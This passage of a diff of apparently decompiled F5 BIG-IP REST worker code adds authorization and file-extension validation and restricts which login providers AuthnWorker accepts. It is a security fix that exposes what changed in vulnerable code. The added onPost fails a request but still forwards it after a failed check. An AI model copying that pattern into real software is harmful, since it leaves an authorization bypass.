(RestWorker)fileTransferPrivateWorker);\n }\n else {\n \n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.postDirectory, this.tmpDirectory);\n - fileTransferWorker.setPublic(false);\n - getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferWorker);\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.postDirectory, this.tmpDirectory);\n + fileTransferPrivateWorker.setPublic(false);\n + getServer().registerWorker(this.localUri + \"-private\", (RestWorker)fileTransferPrivateWorker);\n }\n \n ArrayList<String> arrayList = new ArrayList();\n arrayList.add(\"/*\");\n getServer().registerCollectionWorker(arrayList, this);\n registerPublicUri(getUri().getPath(), null);\n \n super.onStart(paramRestServer);\n }\n \n \n protected void forwardRequest(final RestOperation request) {\n List list = request.getParsedCollectionEntries();\n RestOperation restOperation = (RestOperation)request.clone();\n \n +\n URI uRI = getUri();\n try {\n if (list == null || list.size() == 0) {\n uRI = UrlHelper.buildLocalUri(getServer(), new String[] { this.localUri + \"-private\" });\n } else {\n \n String str1 = request.getAuthUser();\n String str2 = str1 + \"~\" + ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n uRI = UrlHelper.buildLocalUri(getServer(), new String[] { this.localUri + \"-private\", \"/\", str2 });\n }\n \n } catch (Exception exception) {}\n \n \n restOperation.setUri(uRI).setCompletion(new RestRequestCompletion()\n {\n public void completed(RestOperation param1RestOperation) {\n String str = param1RestOperation.getBodyAsString();\n if (str == null || str.isEmpty()) {\n request.setBinaryBody(param1RestOperation.getBinaryBody());\n } else {\n \n request.setBody(str);\n }\n \n request.complete();\n }\n \n \n public void failed(Exception param1Exception, RestOperation param1RestOperation) {\n request.fail(param1Exception);\n }\n });\n sendRequest(restOperation);\n }\n \n \n \n protected void onGet(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onQuery(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPost(RestOperation paramRestOperation) {\n + this.LOGGER.info(\"Validating the request\");\n + ValidationResponse validationResponse1 = validateRequest(paramRestOperation);\n + if (!validationResponse1.isValid()) {\n + paramRestOperation.setStatusCode(401);\n + paramRestOperation.fail(new SecurityException(validationResponse1.getMessage()));\n + }\n + ValidationResponse validationResponse2 = AsmRequestValidator.validateFileExtension(paramRestOperation);\n + if (!validationResponse2.isValid()) {\n + paramRestOperation.fail(new IllegalArgumentException(validationResponse2.getMessage()));\n + }\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onDelete(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPatch(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n \n \n protected void onPut(RestOperation paramRestOperation) {\n forwardRequest(paramRestOperation);\n }\n +\n + private ValidationResponse validateRequest(RestOperation paramRestOperation) {\n + ValidationResponse validationResponse = AsmRequestValidator.validateUserAuthorization(paramRestOperation);\n + if (!validationResponse.isValid()) {\n +\n + ValidationResponse validationResponse1 = AsmRequestValidator.validateUserHasFullAuthorization(paramRestOperation);\n + if (!validationResponse1.isValid()) {\n + return validationResponse;\n + }\n + return new ValidationResponse(true);\n + }\n +\n + return validationResponse;\n + }\n }\n diff --git a/com/f5/rest/workers/asm/utils/AsmRequestValidator.java b/com/f5/rest/workers/asm/utils/AsmRequestValidator.java\n new file mode 100644\n index 0000000..6f80b68\n --- /dev/null\n +++ b/com/f5/rest/workers/asm/utils/AsmRequestValidator.java\n @@ -0,0 +1,119 @@\n +package com.f5.rest.workers.asm.utils;\n +\n +import com.f5.mcp.data.DataObject;\n +import com.f5.mcp.io.Connection;\n +import com.f5.mcp.io.ConnectionManager;\n +import com.f5.mcp.io.ObjectManager;\n +import com.f5.mcp.schema.SchemaAttribute;\n +import com.f5.mcp.schema.SchemaStructured;\n +import com.f5.mcp.schema.auth.AuthModule;\n +import com.f5.mcp.schema.auth.UserRolePartition;\n +import com.f5.mcp.schema.common.McpUserRoleT;\n +import com.f5.rest.common.RestOperation;\n +import com.f5.rest.workers.asm.AsmFileTransferConfiguration;\n +import com.f5.rest.workers.filemanagement.FileManagementHelper;\n +import com.google.gson.Gson;\n +import java.io.BufferedReader;\n +import java.io.File;\n +import java.io.FileNotFoundException;\n +import java.io.FileReader;\n +import java.util.ArrayList;\n +import java.util.Arrays;\n +import java.util.List;\n +import java.util.logging.Logger;\n +import java.util.regex.Pattern;\n +\n +\n +\n +\n +\n +public class AsmRequestValidator\n +{\n + private static final Logger LOGGER = Logger.getLogger(AsmRequestValidator.class.getName());\n + private static final String MCP_PARTITION_ALL = \"[All]\";\n + private static final String MCP_PARTITION_COMMON = \"Common\";\n + private static final ArrayList<McpUserRoleT> allowedRoles = new ArrayList<>(Arrays.asList(new McpUserRoleT[] { McpUserRoleT.ROLE_APPLICATION_SECURITY_ADMINISTRATOR, McpUserRoleT.ROLE_APPLICATION_SECURITY_OPERATIONS_ADMINISTRATOR, McpUserRoleT.ROLE_RESOURCE_ADMIN, McpUserRoleT.ROLE_ADMINISTRATOR, McpUserRoleT.ROLE_APPLICATION_SECURITY_EDITOR }));\n +\n +\n +\n +\n +\n + private static String ALLOWED_FILE_FORMATS_CONFIG = \"/etc/asm-file-transfer-config.json\";\n + private static String FILE_REGEX;\n +\n + static {\n + try {\n + File file = new File(ALLOWED_FILE_FORMATS_CONFIG);\n + BufferedReader bufferedReader = new BufferedReader(new FileReader(file));\n + AsmFileTransferConfiguration asmFileTransferConfiguration = (AsmFileTransferConfiguration)(new Gson()).fromJson(bufferedReader, AsmFileTransferConfiguration.class);\n + String str = asmFileTransferConfiguration.getAllowedFileFormatAsString(\"|\");\n + FILE_REGEX = \"^[a-zA-Z0-9_. -~\\\$\\\$\\\\%]+\\\\.(\" + str + \")\";\n + } catch (FileNotFoundException fileNotFoundException) {\n + LOGGER.severe(\"FILE REGEX validator was not calculated:\" + fileNotFoundException.getMessage());\n + }\n + }\n +\n + public static ValidationResponse validateUserAuthorization(RestOperation paramRestOperation) {\n + String str = paramRestOperation.getAuthUser();\n + if (str == null) {\n + return new ValidationResponse(false, \"Could not get the authorized username for this incoming request\");\n + }\n +\n + boolean bool = (str.equals(\"admin\") || str.equals(\"root\")) ? true : false;\n + return new ValidationResponse(bool, String.format(\"User '%s' is not authorized\", new Object[] { str }));\n + }\n +\n + public static ValidationResponse validateUserHasFullAuthorization(RestOperation paramRestOperation) {\n + ConnectionManager connectionManager = ConnectionManager.instance();\n + if (connectionManager == null) {\n + ConnectionManager.init();\n + connectionManager = ConnectionManager.instance();\n + }\n + Connection connection = null;\n + try {\n + connection = connectionManager.getConnection();\n + ObjectManager objectManager = new ObjectManager((SchemaStructured)AuthModule.UserRolePartition, connection);\n + DataObject dataObject = objectManager.newObject();\n + dataObject.put((SchemaAttribute)UserRolePartition.USER, paramRestOperation.getAuthUser());\n + DataObject[] arrayOfDataObject = objectManager.getAll(dataObject);\n + if (arrayOfDataObject != null) {\n + for (DataObject dataObject1 : arrayOfDataObject) {\n + String str = dataObject1.getString((SchemaAttribute)UserRolePartition.PARTITION);\n + if (str.equals(\"[All]\") || str.equals(\"Common\")) {\n + McpUserRoleT mcpUserRoleT = (McpUserRoleT)dataObject1.getToken((SchemaAttribute)UserRolePartition.ROLE);\n + if (allowedRoles.contains(mcpUserRoleT)) {\n + return new ValidationResponse(true);\n + }\n + }\n + }\n + }\n + } catch (Exception exception) {\n + return new ValidationResponse(false, exception.getMessage());\n + } finally {\n + if (connection != null) {\n + connectionManager.freeConnection(connection);\n + }\n + }\n + return new ValidationResponse(false);\n + }\n +\n + public static ValidationResponse validateFileExtension(RestOperation paramRestOperation) {\n + List list = paramRestOperation.getParsedCollectionEntries();\n + if (list == null || list.isEmpty()) {\n + return new ValidationResponse(true);\n + }\n +\n + String str = ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n + if (!Pattern.matches(FILE_REGEX, str)) {\n + FileManagementHelper.cleanPostForResponse(paramRestOperation);\n + paramRestOperation.fail(new IllegalArgumentException(\"A valid file format must be supplied\"));\n + return new ValidationResponse(false, \"A valid file format must be supplied\");\n + }\n + return new ValidationResponse(true);\n + }\n +\n + public static ValidationResponse validateRequestSource(RestOperation paramRestOperation) {\n + LOGGER.info(paramRestOperation.getUri().toString());\n + return new ValidationResponse(true);\n + }\n +}\n diff --git a/com/f5/rest/workers/asm/utils/ValidationResponse.java b/com/f5/rest/workers/asm/utils/ValidationResponse.java\n new file mode 100644\n index 0000000..109fa81\n --- /dev/null\n +++ b/com/f5/rest/workers/asm/utils/ValidationResponse.java\n @@ -0,0 +1,26 @@\n +package com.f5.rest.workers.asm.utils;\n +\n +\n +\n +public class ValidationResponse\n +{\n + private boolean isValid;\n + private String message;\n +\n + public ValidationResponse(boolean paramBoolean) {\n + this.isValid = paramBoolean;\n + }\n +\n + public ValidationResponse(boolean paramBoolean, String paramString) {\n + this.isValid = paramBoolean;\n + this.message = paramString;\n + }\n +\n + public String getMessage() {\n + return this.message;\n + }\n +\n + public boolean isValid() {\n + return this.isValid;\n + }\n +}\n diff --git a/com/f5/rest/workers/authn/AuthnWorker.java b/com/f5/rest/workers/authn/AuthnWorker.java\n index 0658099..ddbe4cf 100644\n --- a/com/f5/rest/workers/authn/AuthnWorker.java\n +++ b/com/f5/rest/workers/authn/AuthnWorker.java\n @@ -1,555 +1,587 @@\n package com.f5.rest.workers.authn;\n \n import com.f5.rest.common.RestErrorResponse;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestRequestSender;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.UrlHelper;\n +import com.f5.rest.common.Utilities;\n import com.f5.rest.common.WellKnownPorts;\n import com.f5.rest.workers.AuthTokenItemState;\n import com.f5.rest.workers.RestResolverGroupEntry;\n import com.f5.rest.workers.authn.providers.AuthProviderCollectionState;\n import com.f5.rest.workers.authn.providers.AuthProviderLoginState;\n import com.f5.rest.workers.authn.providers.AuthProviderState;\n import com.f5.rest.workers.authn.providers.local.LocalAuthLoginWorker;\n import com.f5.rest.workers.authz.AuthSourceState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import java.net.URI;\n import java.util.Collections;\n import java.util.HashMap;\n import java.util.Map;\n import java.util.concurrent.Callable;\n import java.util.concurrent.CancellationException;\n import java.util.concurrent.ExecutorService;\n import java.util.concurrent.Executors;\n import java.util.concurrent.Future;\n import java.util.concurrent.TimeUnit;\n import java.util.concurrent.TimeoutException;\n import java.util.concurrent.atomic.AtomicInteger;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n -\n public class AuthnWorker\n extends RestWorker\n {\n public static final String LOGIN_PATH_SUFFIX = \"login\";\n public static final String WORKER_URI_PATH = UrlHelper.buildUriPath(new String[] { \"shared/\", \"authn\", \"login\" });\n \n public static final String MAX_NUMBER_LOGIN_FAILURE_MSG = \"Maximum number of login attempts exceeded.\";\n \n public static final String LOGIN_ERROR_MSG = \"Unable to login using supplied information. If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\";\n \n public static final int MAX_NUMBER_LOGIN_FAILURES = 5;\n private static final long FAILED_ATTEMPTS_TIMEOUT = TimeUnit.MINUTES.toMicros(5L);\n \n private static final int GET_AUTHSOURCE_MAX_WAIT_MILLIS = 800;\n private static final int GET_AUTHSOURCE_BASE_WAIT_MILLIS = 10;\n private static final int GET_AUTHSOURCE_EXPONENT_FACTOR = 2;\n private static final int GET_AUTHSOURCE_EXPONENTIAL_ATTEMPTS = 5;\n private static final int GET_AUTHSOURCE_LINEAR_FACTOR = 50;\n private final int LOOKUP_AUTH_MAX_WAIT_MILLIS = (int)TimeUnit.SECONDS.toMillis(10L);\n private final int LOOKUP_AUTH_MAX_RETRIES = 10;\n private final Map<URI, AtomicInteger> lookupAuthRetryCountReferenceMap = Collections.synchronizedMap(new HashMap<>());\n \n private class LoginFailures\n {\n public int failures = 0;\n private LoginFailures() {}\n \n public long lastFailureMicros; }\n private final Map<String, RestReference> loginNameToReferenceMap = Collections.synchronizedMap(new HashMap<>());\n \n private final Map<String, LoginFailures> loginFailureMap = Collections.synchronizedMap(new HashMap<>());\n \n \n private final Map<URI, URI> subscriptions = Collections.synchronizedMap(new HashMap<>());\n \n \n \n \n public void onStart(RestServer server) throws Exception {\n setSynchronized(true);\n \n setMaxPendingOperations(10000L);\n setPersisted(false);\n setReplicated(false);\n setIndexed(false);\n setPublic(true);\n \n \n completeStart(null, new URI[] { UrlHelper.buildLocalUriSafe(server, new String[] { LocalAuthLoginWorker.WORKER_URI_PATH }), UrlHelper.buildLocalUriSafe(server, new String[] { \"shared/resolver/groups\" }) });\n }\n \n \n \n \n \n \n \n \n protected void onStartCompleted(Object state, Exception stateLoadEx, Exception availabilityEx) throws Exception {\n subscribeToAuthProviderGroup();\n \n +\n +\n + this.subscriptions.put(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH), makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n +\n +\n super.onStartCompleted(state, stateLoadEx, availabilityEx);\n }\n \n private void subscribeToAuthProviderGroup() throws Exception {\n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().warningFmt(\"Failed to subscribe to auth providers: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.getLogger().fine(\"Successfully subscribed to auth providers\");\n \n AuthzHelper.getAllAuthProviders(AuthnWorker.this.getServer(), new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().warningFmt(\"Failed to get all auth providers: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.processAuthProviderGroupNotification(operation);\n }\n });\n }\n };\n \n \n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().severeFmt(\"Notification from auth providers failed: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.processAuthProviderGroupNotification(operation);\n }\n };\n \n AuthzHelper.subscribeToAuthProviderGroup(getServer(), subscribeCompletion, notificationCompletion);\n }\n \n \n \n \n \n private void processAuthProviderGroupNotification(RestOperation operation) {\n RestResolverGroupEntry entry = (RestResolverGroupEntry)operation.getTypedBody(RestResolverGroupEntry.class);\n \n \n if (entry.references != null) {\n for (RestReference ref : entry.references) {\n if (operation.getMethod().equals(RestOperation.RestMethod.DELETE)) {\n unsubscribe(ref.link); continue;\n }\n subscribeToAuthProvider(ref.link);\n }\n }\n }\n \n \n \n private void lookupAuthProviderCollection(URI authProviderLink) {\n this.lookupAuthRetryCountReferenceMap.put(authProviderLink, new AtomicInteger(0));\n lookupAuthProviderCollectionRetry(authProviderLink);\n }\n \n \n private void lookupAuthProviderCollectionRetry(final URI authProviderLink) {\n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n if (((AtomicInteger)AuthnWorker.this.lookupAuthRetryCountReferenceMap.get(authProviderLink)).intValue() > 10) {\n AuthnWorker.this.getLogger().severeFmt(\"Max retries; failed to lookup auth provider %s: %s\", new Object[] { this.val$authProviderLink.toString(), RestHelper.throwableStackToString(ex) });\n \n return;\n }\n \n AuthnWorker.this.getLogger().warningFmt(\"Failed to lookup auth provider %s: Retry number %s\", new Object[] { this.val$authProviderLink.toString(), Integer.valueOf(((AtomicInteger)AuthnWorker.access$100(this.this$0).get(this.val$authProviderLink)).intValue()) });\n \n \n AuthnWorker.this.scheduleTaskOnce(new Runnable()\n {\n public void run() {\n ((AtomicInteger)AuthnWorker.this.lookupAuthRetryCountReferenceMap.get(authProviderLink)).incrementAndGet();\n AuthnWorker.this.lookupAuthProviderCollectionRetry(authProviderLink);\n }\n }, AuthnWorker.this.LOOKUP_AUTH_MAX_WAIT_MILLIS);\n }\n \n \n public void completed(RestOperation operation) {\n AuthProviderCollectionState collectionState = (AuthProviderCollectionState)operation.getTypedBody(AuthProviderCollectionState.class);\n \n \n for (AuthProviderState item : collectionState.items) {\n AuthnWorker.this.addAuthProvider(item);\n }\n AuthnWorker.this.lookupAuthRetryCountReferenceMap.remove(authProviderLink);\n }\n };\n \n RestOperation op = RestOperation.create().setUri(makeLocalUri(authProviderLink)).setCompletion(completion);\n \n sendGet(op);\n }\n \n \n private void unsubscribe(URI providerCollectionLink) {\n URI notificationWorkerUri = this.subscriptions.get(providerCollectionLink);\n \n if (notificationWorkerUri == null) {\n return;\n }\n \n RestOperation subscribeRequest = RestOperation.create().setUri(makeLocalUri(providerCollectionLink));\n \n try {\n sendDeleteForSubscription(subscribeRequest, notificationWorkerUri);\n } catch (Exception e) {\n getLogger().fineFmt(\"Failed to unsubscribe to %s: %s\", new Object[] { providerCollectionLink.getPath(), RestHelper.throwableStackToString(e) });\n }\n }\n \n \n private void subscribeToAuthProvider(final URI providerCollectionLink) {\n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n AuthProviderState state = (AuthProviderState)operation.getTypedBody(AuthProviderState.class);\n \n if (operation.getMethod().equals(RestOperation.RestMethod.DELETE)) {\n AuthnWorker.this.removeAuthProvider(state);\n } else {\n AuthnWorker.this.addAuthProvider(state);\n }\n }\n \n \n \n public void failed(Exception ex, RestOperation operation) {\n AuthnWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().severeFmt(\"Failed to subscribe to auth provider %s: %s\", new Object[] { this.val$providerCollectionLink.getPath(), RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.getLogger().fine(\"Successfully subscribed to auth provider.\");\n AuthnWorker.this.lookupAuthProviderCollection(providerCollectionLink);\n }\n };\n \n \n RestOperation subscribeRequest = RestOperation.create().setUri(makeLocalUri(providerCollectionLink)).setCompletion(subscribeCompletion);\n \n try {\n URI notificationUri = sendPostForSubscription(subscribeRequest, getServer(), notificationCompletion);\n \n this.subscriptions.put(providerCollectionLink, notificationUri);\n } catch (Exception e) {\n getLogger().severeFmt(\"Error while subscribing to %s: %s\", new Object[] { providerCollectionLink.getPath(), RestHelper.throwableStackToString(e) });\n }\n }\n \n \n \n \n private void addAuthProvider(AuthProviderState state) {\n getLogger().fineFmt(\"Added a new auth provider [%s] at [%s].\", new Object[] { state.name, state.loginReference.link });\n \n this.loginNameToReferenceMap.put(state.name, state.loginReference);\n }\n \n private void removeAuthProvider(AuthProviderState state) {\n getLogger().fineFmt(\"Removed an auth provider %s.\", new Object[] { state.name });\n this.loginNameToReferenceMap.remove(state.name);\n }\n \n \n protected void onPost(final RestOperation request) {\n final String incomingAddress = request.getRemoteSender();\n \n final AuthnWorkerState state = (AuthnWorkerState)request.getTypedBody(AuthnWorkerState.class);\n AuthProviderLoginState loginState = (AuthProviderLoginState)request.getTypedBody(AuthProviderLoginState.class);\n \n \n - if (state.password == null && state.bigipAuthCookie == null) {\n + if (Utilities.isNullOrEmpty(state.password) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n state.bigipAuthCookie = request.getCookie(\"BIGIPAuthCookie\");\n loginState.bigipAuthCookie = state.bigipAuthCookie;\n }\n \n if (incomingAddress != null && incomingAddress != \"Unknown\") {\n loginState.address = incomingAddress;\n }\n \n - if ((state.username == null || state.password == null) && state.bigipAuthCookie == null) {\n + if ((Utilities.isNullOrEmpty(state.username) || Utilities.isNullOrEmpty(state.password)) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n +\n request.setStatusCode(401);\n String msg = String.format(\"username and password must not be null or %s in Cookie header should be used.\", new Object[] { \"BIGIPAuthCookie\" });\n \n request.fail(new SecurityException(msg));\n \n +\n return;\n }\n \n + boolean isAllowedLinks = false;\n +\n +\n +\n +\n +\n +\n +\n + if (state.loginReference != null && state.loginReference.link != null) {\n +\n + for (URI iter : this.subscriptions.keySet()) {\n + if (state.loginReference.link.getPath().equals(iter.getPath())) {\n + isAllowedLinks = true;\n + break;\n + }\n + }\n + if (!isAllowedLinks) {\n + getLogger().severe(\"No login provider found.\");\n + String msg = String.format(\"No login provider found.\", new Object[0]);\n + request.fail(new SecurityException(msg));\n +\n + return;\n + }\n + }\n +\n state.password = null;\n request.setBody(state);\n \n \n \n if (state.loginReference == null) {\n if (state.loginProviderName == null) {\n ExecutorService executorService = Executors.newSingleThreadExecutor();\n Callable<String> callable = new Callable<String>()\n {\n public String call() throws Exception {\n final String[] providerName = { null };\n RestRequestCompletion getAuthSourceTypeCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation response) {\n AuthSourceState sourceState = (AuthSourceState)response.getTypedBody(AuthSourceState.class);\n if (\"local\".equals(sourceState.type)) {\n providerName[0] = \"local\";\n } else {\n providerName[0] = \"tmos\";\n }\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n request.fail(ex);\n }\n };\n \n AuthzHelper.getAuthSource(AuthnWorker.this.getServer(), getAuthSourceTypeCompletion);\n try {\n int remainingSleepTime = 800, numberOfAttempts = 0;\n int multiplier = 1; numberOfAttempts = 1;\n for (; providerName[0] == null;\n multiplier *= 2, numberOfAttempts++) {\n \n TimeUnit.MILLISECONDS.sleep((10 * multiplier));\n remainingSleepTime -= 10 * multiplier;\n if (providerName[0] != null || numberOfAttempts == 5) {\n break;\n }\n }\n \n while (providerName[0] == null) {\n TimeUnit.MILLISECONDS.sleep(50L);\n remainingSleepTime -= 50;\n }\n AuthnWorker.this.getLogger().fine(\"Total Time taken to set the loginProviderName is \" + (800 - remainingSleepTime) + \"ms\");\n } catch (InterruptedException e) {\n AuthnWorker.this.getLogger().severe(\"Error while setting value to loginProviderName when no loginReference and no loginProviderName were given\");\n }\n return providerName[0];\n }\n };\n \n Future<String> future = executorService.submit(callable);\n try {\n state.loginProviderName = future.get(800L, TimeUnit.MILLISECONDS);\n executorService.shutdown();\n } catch (TimeoutException e) {\n getLogger().severe(\"Maximum wait time(800ms) exceeded while getting value of loginProviderName\");\n future.cancel(true);\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n } catch (CancellationException|java.util.concurrent.ExecutionException|InterruptedException e) {\n getLogger().severe(\"Error while getting value of loginProviderName:\" + RestHelper.throwableStackToString(e));\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n }\n getLogger().fineFmt(\"loginProviderName set to %s as default value, based on authentication source type when it was null\", new Object[] { state.loginProviderName });\n }\n \n if (state.loginProviderName != null) {\n if (state.loginProviderName.equals(\"local\")) {\n state.loginReference = new RestReference(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n }\n else if (this.loginNameToReferenceMap.containsKey(state.loginProviderName)) {\n state.loginReference = this.loginNameToReferenceMap.get(state.loginProviderName);\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is invalid.\"));\n return;\n }\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is null.\"));\n \n \n return;\n }\n }\n \n final String failureKey = String.format(\"%s:%s\", new Object[] { (state.username == null) ? state.bigipAuthCookie : state.username, state.loginReference.link });\n \n \n \n LoginFailures failures = this.loginFailureMap.get(failureKey);\n \n if (failures != null && failures.failures >= 5) {\n if (RestHelper.getNowMicrosUtc() - failures.lastFailureMicros < FAILED_ATTEMPTS_TIMEOUT) {\n request.setStatusCode(401);\n request.fail(new SecurityException(\"Maximum number of login attempts exceeded.\"));\n return;\n }\n this.loginFailureMap.remove(failureKey);\n }\n \n \n RestRequestCompletion authCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n String loginProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n \n \n String clientId = (state.username == null) ? (\"Cookie \" + state.bigipAuthCookie) : (\"User \" + state.username);\n \n AuthnWorker.this.getLogger().infoFmt(\"%s failed to login from %s using the %s authentication provider\", new Object[] { clientId, this.val$incomingAddress, loginProviderId });\n \n \n AuthnWorker.LoginFailures failures = (AuthnWorker.LoginFailures)AuthnWorker.this.loginFailureMap.get(failureKey);\n if (failures == null) {\n failures = new AuthnWorker.LoginFailures();\n AuthnWorker.this.loginFailureMap.put(failureKey, failures);\n }\n failures.lastFailureMicros = RestHelper.getNowMicrosUtc();\n failures.failures++;\n \n request.setStatusCode(401);\n \n if (ex.getMessage() == null || ex.getMessage().isEmpty()) {\n request.fail(ex, RestErrorResponse.create().setMessage(\"Unable to login using supplied information. If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\"));\n return;\n }\n request.fail(ex);\n }\n \n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.loginFailureMap.remove(failureKey);\n \n AuthProviderLoginState loggedIn = (AuthProviderLoginState)operation.getTypedBody(AuthProviderLoginState.class);\n \n \n String authProviderId = loggedIn.authProviderName;\n if (authProviderId == null) {\n authProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n }\n \n \n AuthnWorker.this.getLogger().finestFmt(\"User %s successfully logged in from %s using the %s authentication provider.\", new Object[] { loggedIn.username, this.val$incomingAddress, authProviderId });\n \n \n \n \n AuthnWorker.generateToken(AuthnWorker.this.getServer(), request, state, loggedIn);\n }\n };\n \n RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n \n \n sendPost(checkAuth);\n }\n \n \n \n \n \n \n \n public static void generateToken(RestServer server, final RestOperation request, final AuthnWorkerState authState, AuthProviderLoginState loginState) {\n if (authState.needsToken != null && !authState.needsToken.booleanValue()) {\n request.setBody(authState);\n request.complete();\n \n return;\n }\n AuthTokenItemState token = new AuthTokenItemState();\n token.userName = loginState.username;\n token.user = loginState.userReference;\n token.groupReferences = loginState.groupReferences;\n token.authProviderName = loginState.authProviderName;\n token.address = request.getXForwarderdFor();\n \n RestRequestCompletion tokenCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n request.fail(ex);\n }\n \n \n \n public void completed(RestOperation operation) {\n AuthTokenItemState token = (AuthTokenItemState)operation.getTypedBody(AuthTokenItemState.class);\n authState.token = token;\n request.setBody(authState);\n request.complete();\n }\n };\n \n \n RestOperation createToken = RestOperation.create().setUri(UrlHelper.buildLocalUriSafe(server, new String[] { WellKnownPorts.AUTHZ_TOKEN_WORKER_URI_PATH })).setBody(token).setCompletion(tokenCompletion).setReferer(\"authn-generate-token\");\n \n \n \n \n \n RestRequestSender.sendPost(createToken);\n }\n }\n diff --git a/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java b/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n index 5e33f0d..caba75d 100644\n --- a/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n +++ b/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n @@ -1,17 +1,18 @@\n package com.f5.rest.workers.liveupdate;\n \n import com.f5.rest.common.RestWorker;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n \n -public class LiveUpdateDownloadWorker extends LiveUpdateFileTransferWorker {\n +public class LiveUpdateDownloadWorker\n + extends LiveUpdateFileTransferWorker {\n private String getDirectory;\n \n public LiveUpdateDownloadWorker(String paramString1, String paramString2) {\n super(paramString1);\n this.getDirectory = paramString2;\n }\n \n protected RestWorker getRestWorker() throws Exception {\n - return (RestWorker)new FileTransferWorker(this.getDirectory);\n + return (RestWorker)new FileTransferPrivateWorker(this.getDirectory);\n }\n }\n diff --git a/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java b/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n index 03cddd7..d46ac00 100644\n --- a/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n +++ b/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n @@ -1,59 +1,60 @@\n package com.f5.rest.workers.liveupdate;\n \n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestWorker;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n import java.io.File;\n import java.nio.file.Files;\n import java.nio.file.LinkOption;\n import java.nio.file.Path;\n import java.nio.file.Paths;\n import java.nio.file.attribute.GroupPrincipal;\n import java.nio.file.attribute.PosixFileAttributeView;\n import java.nio.file.attribute.PosixFileAttributes;\n import java.nio.file.attribute.UserPrincipal;\n import java.util.List;\n \n public class LiveUpdateUploadWorker\n - extends LiveUpdateFileTransferWorker {\n + extends LiveUpdateFileTransferWorker\n +{\n private String postDirectory;\n private String tmpDirectory;\n \n public LiveUpdateUploadWorker(String paramString1, String paramString2, String paramString3) {\n super(paramString1);\n this.postDirectory = paramString2;\n this.tmpDirectory = paramString3;\n }\n \n protected void onRequestComplete(RestOperation paramRestOperation) {\n List list = paramRestOperation.getParsedCollectionEntries();\n if (list != null && !list.isEmpty()) {\n String str = \"/var/lib/hsqldb/live-update/update-files/\" + ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n File file = new File(str);\n if (file.exists()) {\n \n try {\n File file1 = new File(\"/var/lib/hsqldb/live-update/update-files\");\n PosixFileAttributes posixFileAttributes = 